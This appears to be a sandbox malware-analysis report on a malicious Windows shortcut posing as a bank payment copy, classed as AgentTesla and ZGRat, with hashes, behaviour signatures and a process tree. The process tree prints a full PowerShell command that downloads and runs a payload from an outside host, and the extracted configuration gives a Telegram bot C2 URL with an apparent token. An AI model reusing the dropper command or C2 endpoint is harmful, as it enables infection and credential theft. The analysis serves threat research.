Overview

overview

10

Static

static

1

Banque BEA...xt.lnk

windows7-x64

10

Banque BEA...xt.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    114s
  • max time network
    122s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-02-2024 07:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Banque BEA_Copie de Paiement_txt.lnk

  • Size

    2KB

  • MD5

    32d11ce69ae0bae7375a6a9fcdf65238

  • SHA1

    d7ee753812e1b9180d7df3df34df08f13c97ac7a

  • SHA256

    8420bf1711e75f17cb07a83a66e038f9635968eeaa17c3540c966347bb1d373c

  • SHA512

    3e4c138fdb052ea6a1bd313f0330ce7a0f7b4abff4eccbc612aaccf639ef5fa50491987e8e22817e028c465762547cd253cc1f0d32944f106b0f06ab703cc2a3

Score
10/10
agentteslazgratkeyloggerpersistenceratspywarestealertrojan

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://remisat.com.uy/bim/office.bat

Extracted

Family

agenttesla

C2

https://api.telegram.org/bot6788300365:AAHk2GTWUvl7PlvMxXk2M1D_7e1yYgg26zE/

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Detect ZGRat V1 34 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Banque BEA_Copie de Paiement_txt.lnk"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4804
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -noLogo -Command notepad.exe;(new-object System.Net.WebClient).DownloadFile('https://remisat.com.uy/bim/office.bat','word.exe');./word.exe;
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1564
      • C:\Windows\system32\notepad.exe
        "C:\Windows\system32\notepad.exe"
        3⤵
          PID:4132
        • C:\Users\Admin\AppData\Local\Temp\word.exe
          "C:\Users\Admin\AppData\Local\Temp\word.exe"
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1860
          • C:\Users\Admin\AppData\Local\Temp\word.exe
            C:\Users\Admin\AppData\Local\Temp\word.exe
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5052

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\word.exe.log
      Filesize

      1KB

      MD5

      9121e6ef340710951d0829deb721bf6a

      SHA1

      3354ef7bc1f26e0e64e40907ff9a347df5630e1e

      SHA256

      6fa111c0652755148dffb297e76843ba63eb86dfe92b6fa18a3f715dd4c21baa

      SHA512

      e89216568cb6b64319dd69507875d74ab17d4bf464ea97f82df5f25ca974fa94709f828b951e81039fd442861d08fd92a481ea5917e40ace6df67e0b442e0e57

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vmin5fok.52l.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\word.exe
      Filesize

      33KB

      MD5

      d5b2699f5db98b878a555b02c908a91a

      SHA1

      6a88c9e99108d0cb856c26f28b051de89e776666

      SHA256

      98db16986decc074c69f47419cb5cd4a55c6a776baf68c7781e5a1a5df0f3eb4

      SHA512

      400f2d42c6172fd5b2e958892eeaa576683719bbb5fb4e901202b627a5f81f15cd82cbce0f69921502faf45e4ce18bc04c81214d54bbe4437d3602d9dab147b0

      Download Submit

    • memory/1564-3-0x00000224483A0000-0x00000224483C2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1564-12-0x00007FFF93ED0000-0x00007FFF94991000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1564-13-0x0000022448390000-0x00000224483A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1564-14-0x0000022448390000-0x00000224483A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1564-23-0x00007FFF93ED0000-0x00007FFF94991000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1860-24-0x00000000746A0000-0x0000000074E50000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/1860-25-0x0000000000EE0000-0x0000000000EEE000-memory.dmp

      Filesize

      56KB

      Download

    • memory/1860-26-0x0000000003340000-0x0000000003350000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1860-27-0x0000000006260000-0x0000000006318000-memory.dmp

      Filesize

      736KB

      Download

    • memory/1860-28-0x0000000006940000-0x0000000006F58000-memory.dmp

      Filesize

      6.1MB

      Download

    • memory/1860-29-0x0000000006470000-0x000000000657A000-memory.dmp

      Filesize

      1.0MB

      Download

    • memory/1860-30-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-31-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-33-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-35-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-37-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-39-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-41-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-43-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-45-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-47-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-49-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-51-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-53-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-55-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-57-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-59-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-61-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-63-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-65-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-67-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-69-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-71-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-73-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-75-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-77-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-79-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-81-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-83-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-85-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-87-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-89-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-91-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-93-0x0000000006260000-0x0000000006313000-memory.dmp

      Filesize

      716KB

      Download

    • memory/1860-1144-0x00000000063B0000-0x00000000063B1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1860-1145-0x0000000006580000-0x00000000065C2000-memory.dmp

      Filesize

      264KB

      Download

    • memory/1860-1146-0x00000000065C0000-0x000000000660C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/1860-1147-0x0000000007660000-0x0000000007C04000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/1860-1153-0x00000000746A0000-0x0000000074E50000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/5052-1154-0x00000000746A0000-0x0000000074E50000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/5052-1155-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

      Download

    • memory/5052-1157-0x00000000051C0000-0x0000000005226000-memory.dmp

      Filesize

      408KB

      Download

    • memory/5052-1156-0x00000000050B0000-0x00000000050C0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/5052-1158-0x0000000006780000-0x000000000681C000-memory.dmp

      Filesize

      624KB

      Download

    • memory/5052-1159-0x0000000006A00000-0x0000000006A92000-memory.dmp

      Filesize

      584KB

      Download

    • memory/5052-1160-0x00000000069C0000-0x00000000069CA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/5052-1161-0x00000000746A0000-0x0000000074E50000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/5052-1162-0x00000000050B0000-0x00000000050C0000-memory.dmp

      Filesize

      64KB

      Download